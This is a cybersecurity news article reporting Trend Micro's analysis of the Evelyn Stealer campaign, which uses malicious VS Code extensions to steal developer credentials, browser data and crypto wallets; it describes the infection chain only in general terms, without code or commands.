Evelyn Stealer campaign weaponizes Microsoft’s Visual Studio Code ecosystem

Published: 21 January 2026
visual-studio-code
Image by Cybernews.

A new malware campaign is targeting software developers with a new information stealer called Evelyn Stealer, which weaponizes the Microsoft Visual Studio Code (VS Code) extension ecosystem.

According to Trend Micro researchers, the malware is designed to exfiltrate sensitive information, including developer credentials and cryptocurrency-related data.

Compromised developer environments can also be abused as access points into broader organizational systems, they said in an analysis published this week.

ADVERTISEMENT

More specifically, the Evelyn Stealer campaign is seemingly weaponizing the VS Code extension ecosystem to deploy a multistage information-stealing malware. Compromised developer environments can also be abused as access points into broader organizational systems.

“This activity affects organizations with software development teams that rely on VSC and third-party extensions as well as those with access to production systems, cloud resources, or digital assets,” said Trend Micro.

jurgita justinasv Izabelė Pukėnaitė vilius Ernestas Naprys Gintaras Radauskas
Don't miss our latest stories on Google News. Add us as your Preferred Source on Google
Follow us

Details of the campaign were first documented by Koi Security last month, describing three VS Code extensions that ultimately dropped a malicious downloader DLL responsible for launching a hidden PowerShell command to fetch and execute a second-stage payload.

The executable then decrypts and injects the main stealer payload into a legitimate Windows process directly in memory. This allows it to harvest sensitive data and exfiltrate it to a remote server via FTP as a ZIP file.

According to Trend Micro, some of the data pilfered by the Evelyn Stealer includes clipboard content, installed apps, crypto wallets, running processes, desktop screenshots, stored WiFi credentials, system information, and credentials and stored cookies from Google Chrome and Microsoft Edge.

Developer communities are seen as high-value targets given their important role in the software development ecosystem.

The malware additionally implements safeguards to detect analysis and virtual environments and takes steps to terminate active browser processes to ensure a seamless data collection process and prevent any potential interference by cyber defenders.

ADVERTISEMENT

“The Evelyn Stealer campaign reflects the operationalization of attacks against developer communities, which are seen as high-value targets given their important role in the software development ecosystem,” said Trend Micro.

Unlock exclusive Cybernews content on YouTube.

Share
Post
Share
Share
Share
More from Cybernews
Companies using Fable 5 beware: it’s collecting your data, and there are no exceptions
World’s leading mathematicians ridicule AI hype in high-IQ declaration
Democrats are far more worried than Republicans that AI will take jobs, new poll finds
Europe’s tech revolution feels like Soviet déjà vu
New York demands advertisers use “synthetic performer” label or else
The surprising way Elon Musk is powering your next holiday flight
ADVERTISEMENT